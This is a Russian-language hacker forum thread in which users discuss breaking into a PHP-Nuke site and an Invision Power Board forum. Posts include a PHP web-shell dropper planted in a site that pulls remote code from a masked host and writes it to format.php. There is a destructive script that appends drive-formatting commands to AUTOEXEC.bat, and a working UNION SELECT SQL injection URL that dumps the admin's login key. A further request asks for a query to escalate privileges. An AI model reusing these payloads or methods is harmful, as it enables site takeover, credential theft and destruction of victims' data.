Срочная помощь есть php nuke хз какой версии но эксплоит под создание админа пашет так вот как можно хакнуть его если Forums не работает как залить шелл поподробнее плз
В ПОИСК НЕ ПОСЫЛАТЬ НИЧЕГО НОРМАЛЬНОГО НЕ НАШЕЛ!
Вот скрин с админки php код в блок не записать незя!
http://rapidshare.de/files/16158700/clp38.jpg.html
Доступа к phpmyadmin нет!
СРОЧНО ПЛЗ!

Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....

Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....
Пожайлуста по подробнее )

Пожайлуста по подробнее )
А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...

А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...
Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>

Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>
Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....

Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....
хех несмеши )
сначало я встроил в сайт скрипт

<?php
$link = 'http://*******/txt.txt';
$link2 = 'format.php'; //init file address
$file = fopen($link, "r");
$rf = fread($file, 100000);
if ($rf) { echo ""; }
else { echo " "; } //read data of source
echo "< Br>";
$file2 = fopen($link2, "w"); //Copy data in exit_file
if (fputs($file2 , $rf, 100000)) { echo " "; }
else { echo ""; }
echo "Done!";
fclose($file2);
?>


Потом админ заходи к себе на сайт и у него это копируется файл на сервер дальше я внедряю format.php
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c: /q format /n format d: /q";
fputs($file,$str);
fclose($file);
?>
PHP символы не принимает тока простые так значит ссылку и все больше мне от него и его пользователей ничего не надо)

AUTOEXEC.bat ета внатуре крута :) Об остальном ваще промолчу :)
зы: ех жаль до репы твоей добраться не могу ;)

Ладно я понел свою ошибку теперь немогу понять другого вот этим кодом я вывожу в отправку поста инфу о админе
h**p://***********/forum/upload/index.php?&act=Post&CODE=02&f=61&t=7897&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1 ,1,1,CONCAT(id,char(58),name,char(58),member_login _key,char(58)mgroup),1,1,1,1,1,1,1,1,1%20from%20ib f2_members%20WHERE%20id=1%20/*Ну вот вывел теперь решил найти столбец где соль установил IPB 2.0.3 и немогу найти там такого столбца в members нет там такого но ладно решил иди SQL инъекцией но невышло подскажите как граматно сделать обновление IPF2_MEMBERS столбец mgroup просто никак немогу догадаться все мысли свои по поводу этого прошу выложить)

Ну что никто неможет помочь норм запрос к Bd (update) помочь сделать :( :( :(